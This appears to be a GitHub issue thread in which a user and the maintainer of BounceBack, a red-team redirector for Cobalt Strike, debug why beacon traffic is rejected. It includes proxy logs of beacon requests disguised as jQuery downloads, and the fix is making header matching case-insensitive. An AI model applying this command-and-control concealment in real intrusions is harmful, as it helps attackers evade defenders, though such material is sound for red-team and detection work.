2023-11-08T17:45:25+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Cookie":["__cfduid=jiJOtks55p8HeU7XqqTocs9verc1mwmPUas_gnsOtx5ZUstsq3YHPbjqW6Vz5hay5WmAtupYUZn2dES649mGD9bSnrTjgUN-oATHAQMVArEistKoy8id6diXFSqU2FPPwk3nuJNbuPzO1A10ZO6VeVxvlnPlLkSzZ2lFBVa_MmI"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=GET proxy="example http proxy" url=/jquery-3.3.1.min.js
2023-11-08T17:45:25+03:00 DBG http-get match from=192.168.40.129 match= proxy="example http proxy" rule=example_malleable_rule
2023-11-08T17:45:25+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Content-Length":["96"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=POST proxy="example http proxy" url=/jquery-3.3.2.min.js?__cfduid=a06Awll6svBbdrnyXQ
2023-11-08T17:45:25+03:00 DBG http-post match from=192.168.40.129 match= proxy="example http proxy" rule=example_malleable_rule
I also checked your profile with `set host_stage "true";` and it worked as intended.
Finally, reading the logs you provided, I see that BounceBack can't find any matching profile (this is not related to user agents or stagers), so maybe you just mismatched the profiles in CobaltStrike and BounceBack — please recheck that. If not, please provide an http (not https) traffic capture so I can check what's wrong with the beacon requests.
P.S. Next time, please use the issue templates and share long content such as profiles as gists/pastebin records.
First of all, I apologize for the trouble I caused. Second, yes, I also checked the profile I presented and saw my mistake — I pasted the wrong one. However, I still get this error with a different profile (I'm just checking different profiles right now). Can you check this profile for a moment?
https://gist.github.com/BlackSnufkin/b4e389c5a9cc0186ad460839536b85e5
And I confirmed everything twice with the profile: you can connect normally, but through the redirector I get this error:
2023-11-08T16:04:43Z DBG Created new proxy listen=0.0.0.0:80 proxy=http_proxy target=http://127.0.0.1:8443 type=http
2023-11-08T16:04:43Z INF Starting proxy listen=0.0.0.0:80 proxy=http_proxy target=http://127.0.0.1:8443 type=http
2023-11-08T16:04:51Z DBG New request from=192.168.1.146 headers={"Accept":["*/*, */*"],"Accept-Language":["en-US"],"Cache-Control":["no-cache"],"Connection":["close"],"Cookie":["b=.12vPkW22o;_ga=GA1.2.875;d=DEPDDDHGIMDLMOMINHIMKHHFDPKJHHACMJDAGFHFLHPFJNILHKBKHGKHCAPGMNLDBFDAGHIJBJCNJGEAENJKLBNDHIAKCLKBNPMDLEGIACOLOMDNKMFIDNAJBPABIFEDNDAPNBIBGNLLMEAGOPOBADJMGEBIBDNBBHOAJNAGBJNFDMOADCDEBAFGGOLENCOKKKJNLKGPLGDDJNGOMHLMPLLBKPGBMJBNJDOCIALNNEMBJAGPLCJEABKDCADBPAJN;_ga=GA1.2.875;__ar_v4=%8867UMDGS643"],"Host":["192.168.1.145"],"Pragma":["no-cache"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.0 Safari/537.36 Edg/80.0.361.0"]} method=GET proxy=http_proxy url=/messages/JphH-5-kROC6Uf5RJr9y0NIIL
2023-11-08T16:06:27Z DBG http-get/post/stager did not match from=192.168.1.146 proxy=http_proxy rule=malleable_https_traffic
2023-11-08T16:06:27Z WRN Rejected from=192.168.1.146 proxy=http_proxy rule=malleable_https_traffic
Found a bug: the beacon is sending `Connection: Close` while BounceBack expects `Connection: close` (note that the case of the first letter differs).
As a fix, I'll make all header checks case-insensitive. If you have any other suggestions for a fix (perhaps a list of headers whose values might have varying case), you can provide them.
Let me know when you're done playing with the BounceBack malleable filter and I'll close the issue. If you find any other bugs while playing, please report them here.
@BlackSnufkin Any updates?
I haven't come across anything else, looks like it can be closed 👍
So for some reason, profiles that are created with the help of SourcePoint are getting rejected even though host_stage is set to false.